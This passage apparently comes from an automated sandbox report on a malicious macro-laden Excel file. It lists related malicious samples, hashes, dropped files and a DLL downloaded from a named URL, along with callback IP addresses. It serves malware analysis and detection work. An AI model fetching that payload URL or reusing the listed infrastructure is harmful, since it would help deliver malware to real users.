                                                      SecuriteInfo.com.Variant.Ulise.161906.28000.exeGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      SecuriteInfo.com.Variant.Ulise.161906.28000.exeGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      OUTSTANDING_INV_Statement_937931.xlsGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      tUL1bYd7wY.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      nx7kX2s3Cz.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      lovsOrccPZ.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      eOlQnMbHch.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      ctK24ZihI3.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      wB04cTOZEz.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      qgH4ANvXyu.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      jik7JLfp8r.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      7weHCh36Iz.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      6nkttd2IFa.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      C9iwpuGcHW.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      ZrYl7Wm12l.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      37f463bf4616ecd445d4a1937da06e19Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      Tree Top.htmlGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      PT6-1152.docGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      s.dllGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      setup-lightshot.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      s.dllGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      pic05678063.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      e17486cd_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      Purchase Order comfirmation to issue INVOICE.htmlGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      jX16Cu330u.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      5jHZqgYHCZ.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      z3LOkpYy4s.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      dl6jAtWJeR.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      YVNw1T4L7m.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      QsO4ETjF7s.exeGet hashmaliciousBrowse
                                                      • 104.21.64.132

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dllDocuments_111651917_375818984.xlsGet hashmaliciousBrowse
                                                        Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                          Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                            C:\Users\user\bsdnbsej.dbwDocuments_111651917_375818984.xlsGet hashmaliciousBrowse
                                                              Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                Documents_95326461_1831689059.xlsGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                  File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):58596
                                                                  Entropy (8bit):7.995478615012125
                                                                  Encrypted:true
                                                                  SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                  MD5:61A03D15CF62612F50B74867090DBE79
                                                                  SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                  SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                  SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):3.113161810160571
                                                                  Encrypted:false
                                                                  SSDEEP:6:kK17plywTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:DMwTJrkPlE99SNxAhUe0ht
                                                                  MD5:904D08E5688145282A73D037D6307113
                                                                  SHA1:7E23A6D18C088DBB7516B9AC1855EA3435967AD2
                                                                  SHA-256:C5576BAA87E3897225C1BC617B33FA87DD8BBC1C59DFCFAEBF4237D73C776F55
                                                                  SHA-512:24878EB12E0A8712828C45F9C469AE6EAE56DEFFAF1223482462874D80C12CCB8FA6EDD14F8D36B2AD78930D540E2EBEB282CB94D25F8A507E6A10B12ECE4084
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: p...... ............r@..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):525312
                                                                  Entropy (8bit):5.949946336029269
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ga6g2O+gAaY9cc40TeAjaRoA5FZuY+F4:gZlOBAaY9RCy05FZuYq
                                                                  MD5:B80F4B91C29963DF1CFD0D0A8A30E5C6
                                                                  SHA1:09C6AE06E0C10672D91F6850118F41DC3DD66E72
                                                                  SHA-256:0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
                                                                  SHA-512:BDCD3009ED3499055CF73EF1C4DD4BD0942C8B81C395CECF3C9DA790E4867055059D10B05451476D7DA98BBBF472C40536E7A09158B5DE92C57A74E36396D10C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Joe Sandbox View:
                                                                  • Filename: Documents_111651917_375818984.xls, Detection: malicious, Browse
                                                                  • Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse
                                                                  • Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  IE Cache URL:https://otusmail.com/b/vegas.dll
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f].5].5].5C.45M.5C."5..5T.25Z.5].5..5C.%5A.5C.35\.5C.55\.5C.05\.5Rich].5........PE..L......`...........!.....................................................................@.........................@...T...<...P.......x.......................d.......................................@...............<............................text............................... ..`.data...d...........................@....rsrc...x...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\2[1].json
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):40
                                                                  Entropy (8bit):2.321928094887362
                                                                  Encrypted:false
                                                                  SSDEEP:3:sZkMkMkMkMkMkMi:sZZZZZZZi
                                                                  MD5:5EB7E7C038FD732524E07EEB658C1E49
                                                                  SHA1:2B68DFD9203E4391CC69061FBAEB9DA63602A9C2
                                                                  SHA-256:F6E4E5A951E30A747A8CD56976EF28CC4DED0B0A646E6A7E22900D1DB603C2C2
                                                                  SHA-512:D7F08EA48482F15BA33E8D9B99C5432F616AAE0803A9BEC91F1316AD625504A7BD8D998DF4C6DA1251B9AA5A7D34BFA502BE3D034779A83623EB5DE64C08539E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  IE Cache URL:https://54.163.9.216/1296eea0756809a848130bb326e7e01c/2
                                                                  Preview: "..G"..G"..G"..G"..G"..G"..G"..G
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\2[1].json
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):35
                                                                  Entropy (8bit):2.321928094887362
                                                                  Encrypted:false
                                                                  SSDEEP:3:sZkMkMkMkMkMi:sZZZZZZi
                                                                  MD5:2B93BDAE9428D7FCC7AEC66A90C24AC7
                                                                  SHA1:5337AE9A429A5FF7F547CF8D80C19E67AB4F6436
                                                                  SHA-256:9C46687631F4A24E226ACBF0963E755BB1EB1987882C52B2A77ADB08E1A78086
                                                                  SHA-512:2D4F79854C835182B2676E7D24495A149E96479CBDDE10A684C1F81BD977D7E437C6371BE60EA124F7B674F823D70B624ABFC1BD2D4505E39E8697EA52136835
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: "..G"..G"..G"..G"..G"..G"..G
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\fOhFGX570RDgmgTtbgZ5[1]
                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                  File Type:data
                                                                  Category:downloaded
                                                                  Size (bytes):245760
                                                                  Entropy (8bit):7.238285858768308
                                                                  Encrypted:false
                                                                  SSDEEP:6144:jMJVMl7Y2O7HGq+fvY+yZkhv4xd/S2Pn/rr3g2VQ0PhXIO:jlsB7mq+o+yZecd/S2Pn/rr3g2VWO
                                                                  MD5:AF5090353B558B80F4761A7DB1722E6F
                                                                  SHA1:6F9FB31C31CB1A7E559873427F1280F96587D8DB
                                                                  SHA-256:3F4BD952F55D1E072F409026519404AA1D88FA3B221AD3D5E21B4A2F0E9035B6
                                                                  SHA-512:B971601D95CBAF9A4CF043FEEE35D7C49A99CA4823BD68AB93D6B3679D1DC37BDB71DC1161B8510577C44539900E532598BD3502100AC84392949EED35FABF9A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  IE Cache URL:https://18.222.240.99/update/info
                                                                  Preview: .j.135036021..03.0210503r021050320210503202105032021050320218403</.?0.9...3}..d[[C.ABZWAS].RQ[^\F.PT.GE].Y\.tzc.__VT.8=9.0210503..J_...]..._.......R..............x.......N.......N.......J.......R...]... .......Z.......D.......^.......^...`YQY_...2021050320210503bu21|453.A.Q05032021.52291<-0.232.210503..310%032.0105p32 21070340210503402105032.110103202125p.20"10%0320"10%032021 50320210503n.11.5032.11.40320210503202105032.11.(03..11.503202105032021050320210503..11p503202105032.01.403202105032021050320210503.DWID503U.010%032.010103202105032021.50S.BVPDT03V.210.232.210.23202105032021p50s.TSEQ503.%210.332<210.33202105032021p50..BACS503.1210.3322210.33202105032021p50s.BW]_V03.-210.332.210.33202105032021p50q202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503202105032021050320210503
                                                                  C:\Users\user\AppData\Local\Temp\ECA40000
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):96279
                                                                  Entropy (8bit):7.900025161375159
                                                                  Encrypted:false
                                                                  SSDEEP:1536:/gdveaQUVxucuv4KrAeWvibO/WGHKlMVGoIahaDHTU6hryF70qQrRVb:/gdve/+xucCbrAiC/W2K2sTU2yF70q2Z
                                                                  MD5:56BF9CC2186FA1C4B6EDC49112263D23
                                                                  SHA1:BC765F415440E96180F9E7C20C46002006C2AB78
                                                                  SHA-256:450E7209B039580692E6C9AD24445B2B0C254BED96EFB6D8439101D05C8BF326
                                                                  SHA-512:F68BA37FDA4F1DDFC7511EE12E0E87C988B11E1D78DB939C44CD49D75106827479441435AA68F33F9193843684A402AF96196CADEEAE15D39FBF2470CBB074FA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: .U.n.0....?......(..r.izl.4.........I..RV.$P-.v.^.....v.W...#.....E.`.Z.....V~fEL`%hg.f[..j....n.1....fmJ...Q.h V.......^.{..X#.\,>q.lB..9.j...x.......o......j.L...|....Dte>.........J@.|.G+.x)...!..b.|.@f...O^.x)0.~P...X.BH...[.i.....M..$Gib..@]..1U.Dp7..5..(.......y..8@.u.K.4J.t..Pi............8..S.}...(...I..Q.XflO.....r............\.....zz..43e.i.1...w.s.-..?S.1~..^r..!.<....pz....].Z\.4....w.>....|.5.....7LF...0$...."..c^...6...7.......PK..........!........5.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Mon May 3 22:13:16 2021, atime=Mon May 3 22:13:16 2021, length=8192, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):904
                                                                  Entropy (8bit):4.6783357791319
                                                                  Encrypted:false
                                                                  SSDEEP:12:8SsXU0cduCH2POpED4SfupuMe+WrjAZ/DYbD8q5SeuSeL44t2Y+xIBjKZm:8Sr/m159AZbcD8+7aB6m
                                                                  MD5:6E48B421B184EF3D46F06680C9C67A37
                                                                  SHA1:05BDFE2883F349EE93D0D2C2DFEDB09721068365
                                                                  SHA-256:36B99B62DCE47E6EB395E7636EE52A64CD3A50CAF609FA9C39952C3FA97B3A52
                                                                  SHA-512:39730F908C9823FEAA8C74FDF8E7150603FB09925B0CECCF6FFC1B9B328D9EED2D73A8750037DC1A9A86E2DB02E1B7D1937F75E4B7028E0F66E658F00757E41E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: L..................F.............-......q@...v..q@... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N...R......#J.....................jR.j.o.n.e.s.....~.1......R....Desktop.h.......N...R.......Y..............>.....n+..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......980108...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_111651917_375818984.LNK
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:51 2020, mtime=Mon May 3 22:13:16 2021, atime=Mon May 3 22:13:16 2021, length=127488, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2300
                                                                  Entropy (8bit):4.719627546783625
                                                                  Encrypted:false
                                                                  SSDEEP:48:8X4/Qp7/R3uFTkB6pX4/Qp7/R3uFTkB6:8I/ZOKI/ZO
                                                                  MD5:2072AF3584112E066DF89AF3000F028F
                                                                  SHA1:F8BD1B3741503B6F6DA80FF64D6D41BB6B062541
                                                                  SHA-256:E07863A4D3DA52366376DEBA7AAB1A9EF139406AA6DDDBCABBADE8F94A46491D
                                                                  SHA-512:2B54BE96FF87C0851D7365E90E4440C7C488F9200381C36DB28404A5952CB7C99BF77912E00DEF0BC9F625333F5F210C8092B5425958BA370F27D86A6E0CDE47
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: L..................F.... ......R........q@......q@...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N...R......#J.....................jR.j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N...R.......Y..............>.....f.g.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .DOCUME~1.XLS..t......>Qz<.R.......V....................I...D.o.c.u.m.e.n.t.s._.1.1.1.6.5.1.9.1.7._.3.7.5.8.1.8.9.8.4...x.l.s.......g...............-.......f...........>.S......C:\Users\user\Desktop\Documents_111651917_375818984.xls..8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.1.1.1.6.5.1.9.1.7._.3.7.5.8.1.8.9.8.4...x.l.s.........:..,.LB.)...As...`.......X.......980108...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1
                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):4.747564355627999
                                                                  Encrypted:false
                                                                  SSDEEP:3:oyBVomMU9UjaWedPFo5S/9UjaWedPFomMU9UjaWedPFov:dj6CUXCPFySlUXCPF6CUXCPFy
                                                                  MD5:F76CD1EBA58FCA55D502A3D2D9E0E110
                                                                  SHA1:661819A3CAAC115DA23D3461C097EAE0E4C4053A
                                                                  SHA-256:C8BD2E44E413B9A30E0EA6167F7E597C5FC6FE5FFCDBA3BE4281F75FB4469EF9
                                                                  SHA-512:A6298F269F1C478402C91EDD92CF8602CFB87F74D0C6061B9D8FDA33B5EBC43E498717E0F7D7125AA894C810D491470661A3F1F79A7E5F09921944F29BF955CF
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: Desktop.LNK=0..[xls]..Documents_111651917_375818984.LNK=0..Documents_111651917_375818984.LNK=0..[xls]..Documents_111651917_375818984.LNK=0..
                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):22
                                                                  Entropy (8bit):2.9808259362290785
                                                                  Encrypted:false
                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                  Malicious:false
                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                  C:\Users\user\Desktop\CDA40000
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                  Category:dropped
                                                                  Size (bytes):205130
                                                                  Entropy (8bit):6.247544974815653
                                                                  Encrypted:false
                                                                  SSDEEP:6144:z8rmOAIyyzElBIL6lECbgB+P5Nm7TPUSydZ6g6j8rmOAIyyzElBIL6lECbgB+P52:j6g6o
                                                                  MD5:43C68CBD7DED1B36B92E11C1AD2872FD
                                                                  SHA1:9ACF44830C4A3B140576EF005470E4F50C915998
                                                                  SHA-256:1C1BDFC952C61C8837A724B3B8E3E3527DFDE72D810E2754286A1F32C6D4DC7C
                                                                  SHA-512:CB2B9E93BBFE8A7627A7313698FF10560BE67F30B1016E1686DF6EB50F94F64B35177385F9738D8CD04D2D7C9ACBA6AAE9A2FFC7037649BDB0CA043BCE130EB8
                                                                  Malicious:false
                                                                  Preview: ........T8..........................\.p....pratesh B.....a.........=...................................................=.....i..9J.8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......?..........C.a.l.i.b.r.i.1...@...8..........C.a.l.i.b.r.i.1...@..............C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.......?..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...,...8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1...h...8..........C.a.m.b.r.i.a.1.......4..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......
                                                                  C:\Users\user\bsdnbsej.dbw
                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):525312
                                                                  Entropy (8bit):5.949946336029269
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ga6g2O+gAaY9cc40TeAjaRoA5FZuY+F4:gZlOBAaY9RCy05FZuYq
                                                                  MD5:B80F4B91C29963DF1CFD0D0A8A30E5C6
                                                                  SHA1:09C6AE06E0C10672D91F6850118F41DC3DD66E72
                                                                  SHA-256:0A87BD3BB60320B21E493341B70519AF4E46C2E969038D6D89B536CD37AA11D9
                                                                  SHA-512:BDCD3009ED3499055CF73EF1C4DD4BD0942C8B81C395CECF3C9DA790E4867055059D10B05451476D7DA98BBBF472C40536E7A09158B5DE92C57A74E36396D10C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Joe Sandbox View:
                                                                  • Filename: Documents_111651917_375818984.xls, Detection: malicious, Browse
                                                                  • Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse
                                                                  • Filename: Documents_95326461_1831689059.xls, Detection: malicious, Browse
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f].5].5].5C.45M.5C."5..5T.25Z.5].5..5C.%5A.5C.35\.5C.55\.5C.05\.5Rich].5........PE..L......`...........!.....................................................................@.........................@...T...<...P.......x.......................d.......................................@...............<............................text............................... ..`.data...d...........................@....rsrc...x...........................@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                  Static File Info

                                                                  General

                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 3 14:24:59 2021, Security: 0
                                                                  Entropy (8bit):3.330043919784793
                                                                  TrID:
                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                  File name:Documents_111651917_375818984.xls
                                                                  File size:300032
                                                                  MD5:72526a505496a9b7da9a6c9651dbda5e
                                                                  SHA1:84cf963666314eee0d8ad1ef09e5462a66e3ccbf
                                                                  SHA256:3c20530c13d6736ec705786d1694052b2abf42bf87d3bbc359ea95b343fcf681
                                                                  SHA512:ca1ac0057d9ede44a1d9ecf9f854140a39b9b626895c85f34fbf973b8ee749fa2fbd836bc882e9ca2fab7929a9aecb790d7e795ea55a32ce66d6ee1d078afe46
                                                                  SSDEEP:6144:KcPiTQAVW/89BQnmlcGvgZ7r3J8b5IPJK++3ey:uqy
                                                                  File Content Preview:........................>.......................H...........................C...D...E...F...G..................................................................................................................................................................

                                                                  File Icon

                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                  Static OLE Info

                                                                  General

                                                                  Document Type:OLE
                                                                  Number of OLE Files:1

                                                                  OLE File "Documents_111651917_375818984.xls"

                                                                  Indicators

                                                                  Has Summary Info:True
                                                                  Application Name:Microsoft Excel
                                                                  Encrypted Document:False
                                                                  Contains Word Document Stream:False
                                                                  Contains Workbook/Book Stream:True
                                                                  Contains PowerPoint Document Stream:False
                                                                  Contains Visio Document Stream:False
                                                                  Contains ObjectPool Stream:
                                                                  Flash Objects Count:
                                                                  Contains VBA Macros:True

                                                                  Summary

                                                                  Code Page:1251
                                                                  Last Saved By:5
                                                                  Create Time:2006-09-16 00:00:00
                                                                  Last Saved Time:2021-05-03 13:24:59
                                                                  Creating Application:Microsoft Excel
                                                                  Security:0

                                                                  Document Summary

                                                                  Document Code Page:1251
                                                                  Thumbnail Scaling Desired:False
                                                                  Contains Dirty Links:False

                                                                  Streams

                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.338488976625
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00
                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:\x5SummaryInformation
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:0.247889866731
                                                                  Base64 Encoded:False
